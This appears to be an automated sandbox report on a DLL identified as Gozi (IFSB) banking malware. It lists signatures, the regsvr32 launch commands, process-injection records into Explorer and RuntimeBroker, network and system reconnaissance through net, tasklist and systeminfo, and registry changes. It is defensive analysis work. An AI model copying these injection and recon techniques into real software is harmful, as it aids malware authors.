Analysis Overview
SHA256
7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Threat Level: Known bad
The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Gathers system information
Runs net.exe
Enumerates processes with tasklist
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Discovers systems in the same network
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 16:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 16:03
Reported
2022-08-03 16:05
Platform
win7-20220715-en
Max time kernel
45s
Max time network
48s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
Network
Files
memory/1092-54-0x000007FEFBE31000-0x000007FEFBE33000-memory.dmp
memory/1644-55-0x0000000000000000-mapping.dmp
memory/1644-56-0x0000000075481000-0x0000000075483000-memory.dmp
memory/1644-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1644-62-0x00000000000E0000-0x00000000000ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 16:03
Reported
2022-08-03 16:05
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
125s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3932 set thread context of 3020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 3020 set thread context of 3448 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 3720 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 4104 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 536 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 2616 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db13e6613606261e295c366b3400b7db9497f7721833709005687624cef2c870" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = (binary data elided) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 4de967a852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = f1f395a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\43062c64cdc78544bd046edef55edfa8170856ee30b98e629b82464899b859a6" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = 9baac7a852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\93214ced978b1f3fa5c37bde5aa71302a07ca2e9469b370cc11bc61930803bf3" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 30ca9fa852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = (binary data elided) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8b1ea3dafdc11380b50b7cb71940868d9f0ca3e1578253ed3647204878806d8f" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = (binary data elided) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = 8c676aa652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = 3eaaa8a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = 0f69c8a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = e5157fa852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 4f3b44a852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\89e438a32df92b68baa99a7b1f853e9c5016ac2f42d270dcdb0f22cca0d53f2e" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = (binary data elided) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 127f80a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
